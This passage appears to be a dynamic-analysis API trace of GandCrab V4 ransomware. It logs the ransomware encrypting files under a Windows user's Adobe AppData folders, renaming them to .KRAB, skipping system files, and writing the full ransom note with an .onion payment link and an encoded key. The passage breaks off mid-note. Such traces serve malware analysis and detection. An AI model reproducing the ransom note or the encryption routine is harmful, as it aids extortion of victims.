CryptGetKeyParam (in: hKey=0xfbd8e0, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0056.571] CryptEncrypt (in: hKey=0xfbd8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0056.572] GetLastError () returned 0x0 [0056.572] CryptDestroyKey (hKey=0xfbd8e0) returned 1 [0056.572] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.572] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0xfbca08) returned 1 [0056.572] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0xfbd6a0) returned 1 [0056.572] CryptGetKeyParam (in: hKey=0xfbd6a0, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0056.572] CryptEncrypt (in: hKey=0xfbd6a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0056.573] GetLastError () returned 0x0 [0056.573] CryptDestroyKey (hKey=0xfbd6a0) returned 1 [0056.573] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.573] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0056.573] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0056.575] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0056.575] ReadFile (in: hFile=0x464, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338e2fc*=0x1a9, lpOverlapped=0x0) returned 1 [0056.611] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffffe57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.611] WriteFile (in: hFile=0x464, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1a9, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e2f8*=0x1a9, lpOverlapped=0x0) returned 1 [0056.611] WriteFile (in: hFile=0x464, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0056.649] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.653] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.654] CloseHandle (hObject=0x464) returned 1 [0056.657] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.658] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.krab")) returned 1 [0056.659] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.659] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0056.659] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.659] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.659] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a08d2ca4dee3d.lock" [0056.659] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.659] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 101 [0056.660] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a08d2ca4dee3d.lock") returned 96 [0056.660] lstrlenW (lpString=".lock") returned 5 [0056.660] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.660] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.660] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.660] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.660] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0056.660] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.661] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.661] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\KRAB-DECRYPT.txt" [0056.661] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.661] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\KRAB-DECRYPT.txt.KRAB") returned 94 [0056.661] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\KRAB-DECRYPT.txt") returned 89 [0056.661] lstrlenW (lpString=".txt") returned 4 [0056.661] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.661] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.661] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.662] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\KRAB-DECRYPT.txt") returned 89 [0056.662] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\KRAB-DECRYPT.txt") returned 89 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.662] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.662] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.662] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0056.662] FindClose (in: hFindFile=0xfbd260 | out: hFindFile=0xfbd260) returned 1 [0056.663] CloseHandle (hObject=0x45c) returned 1 [0056.663] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.663] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.663] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.663] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a08d2ca4dee3d.lock" [0056.663] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.663] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 92 [0056.663] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a08d2ca4dee3d.lock") returned 87 [0056.664] lstrlenW (lpString=".lock") returned 5 [0056.664] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.664] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.664] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.664] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.664] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.664] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.664] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.665] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\KRAB-DECRYPT.txt" [0056.665] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.665] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\KRAB-DECRYPT.txt.KRAB") returned 85 [0056.665] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\KRAB-DECRYPT.txt") returned 80 [0056.665] lstrlenW (lpString=".txt") returned 4 [0056.665] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.665] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.665] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\KRAB-DECRYPT.txt") returned 80 [0056.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\KRAB-DECRYPT.txt") returned 80 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.666] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.666] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.666] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0056.666] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0056.667] CloseHandle (hObject=0x454) returned 1 [0056.667] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0056.667] FindClose (in: hFindFile=0xfbd760 | out: hFindFile=0xfbd760) returned 1 [0056.667] CloseHandle (hObject=0x44c) returned 1 [0056.670] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.670] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.670] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.670] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\KRAB-DECRYPT.txt" [0056.670] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.670] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\KRAB-DECRYPT.txt.KRAB") returned 73 [0056.670] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\KRAB-DECRYPT.txt") returned 68 [0056.670] lstrlenW (lpString=".txt") returned 4 [0056.670] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.673] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.673] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.673] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\KRAB-DECRYPT.txt") returned 68 [0056.673] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\KRAB-DECRYPT.txt") returned 68 [0056.673] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.673] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.673] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.673] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.673] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.674] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.674] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.674] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.674] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.674] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.674] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.674] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0056.674] FindClose (in: hFindFile=0xfbdce0 | out: hFindFile=0xfbdce0) returned 1 [0056.674] CloseHandle (hObject=0x430) returned 1 [0056.674] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0056.675] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.675] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.675] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a08d2ca4dee3d.lock" [0056.675] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.675] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 72 [0056.675] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a08d2ca4dee3d.lock") returned 67 [0056.675] lstrlenW (lpString=".lock") returned 5 [0056.675] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.675] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.675] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.676] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.676] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0056.676] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0056.676] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0056.676] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Flash Player" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player" [0056.676] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\" [0056.676] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.676] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.677] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.677] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.677] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.677] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.677] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.677] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\\\KRAB-DECRYPT.txt") returned 74 [0056.677] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0056.683] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 